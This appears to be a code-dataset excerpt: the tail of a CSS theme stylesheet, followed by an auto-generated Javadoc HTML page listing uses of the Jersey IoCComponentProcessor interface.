.checkout-content .left input[type="text"],
.checkout-content .left input[type="password"] {
width: 95% !important;
}
.row .head-search {
float: none !important;
}
#tab-related .product-grid > div {
width: 100%;
}
.pull-right[class*="span"],
.row-fluid .pull-right[class*="span"] {
float: none;
}
.row .mijosearch_bg_module,
.row .head-search p {
text-align: center;
}
.row .head-search {
float: left !important;
}
#jmslideshow {
background: none;
margin: 20px auto 30px auto;
padding: 0px;
width: 100%;
}
#jmslideshow #jmslideshow-inner {
width: 100%;
margin-left: 0px;
background: black;
}
.jmslideshow .slideshow-content * {
font-size: 14px !important;
}
.jmslideshow .slideshow-content {
left: 0 !important;
top: 10% !important;
width: auto !important;
}
}
|
lib/jersey1.9/apidocs/jersey/com/sun/jersey/core/spi/component/ioc/class-use/IoCComponentProcessor.html | jonathanrcarter/divv-amsterdam-parkingapi | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>
Uses of Interface com.sun.jersey.core.spi.component.ioc.IoCComponentProcessor (jersey-bundle 1.19 API)
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Interface com.sun.jersey.core.spi.component.ioc.IoCComponentProcessor (jersey-bundle 1.19 API)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/IoCComponentProcessor.html" title="interface in com.sun.jersey.core.spi.component.ioc"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../../../index.html?com/sun/jersey/core/spi/component/ioc//class-useIoCComponentProcessor.html" target="_top"><B>FRAMES</B></A>
<A HREF="IoCComponentProcessor.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Interface<br>com.sun.jersey.core.spi.component.ioc.IoCComponentProcessor</B></H2>
</CENTER>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
Packages that use <A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/IoCComponentProcessor.html" title="interface in com.sun.jersey.core.spi.component.ioc">IoCComponentProcessor</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><A HREF="#com.sun.jersey.core.spi.component.ioc"><B>com.sun.jersey.core.spi.component.ioc</B></A></TD>
<TD>Provides support for IoC-based components. </TD>
</TR>
</TABLE>
<P>
<A NAME="com.sun.jersey.core.spi.component.ioc"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
Uses of <A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/IoCComponentProcessor.html" title="interface in com.sun.jersey.core.spi.component.ioc">IoCComponentProcessor</A> in <A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/package-summary.html">com.sun.jersey.core.spi.component.ioc</A></FONT></TH>
</TR>
</TABLE>
<P>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/package-summary.html">com.sun.jersey.core.spi.component.ioc</A> that return <A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/IoCComponentProcessor.html" title="interface in com.sun.jersey.core.spi.component.ioc">IoCComponentProcessor</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/IoCComponentProcessor.html" title="interface in com.sun.jersey.core.spi.component.ioc">IoCComponentProcessor</A></CODE></FONT></TD>
<TD><CODE><B>IoCComponentProcessorFactory.</B><B><A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/IoCComponentProcessorFactory.html#get(java.lang.Class, com.sun.jersey.core.spi.component.ComponentScope)">get</A></B>(java.lang.Class c,
<A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ComponentScope.html" title="enum in com.sun.jersey.core.spi.component">ComponentScope</A> scope)</CODE>
<BR>
Get a <A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/IoCComponentProcessor.html" title="interface in com.sun.jersey.core.spi.component.ioc"><CODE>IoCComponentProcessor</CODE></A> instance given a class
and scope.</TD>
</TR>
</TABLE>
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../com/sun/jersey/core/spi/component/ioc/IoCComponentProcessor.html" title="interface in com.sun.jersey.core.spi.component.ioc"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../../../index.html?com/sun/jersey/core/spi/component/ioc//class-useIoCComponentProcessor.html" target="_top"><B>FRAMES</B></A>
<A HREF="IoCComponentProcessor.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
Copyright © 2015 <a href="http://www.oracle.com/">Oracle Corporation</a>. All Rights Reserved.
</BODY>
</HTML>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.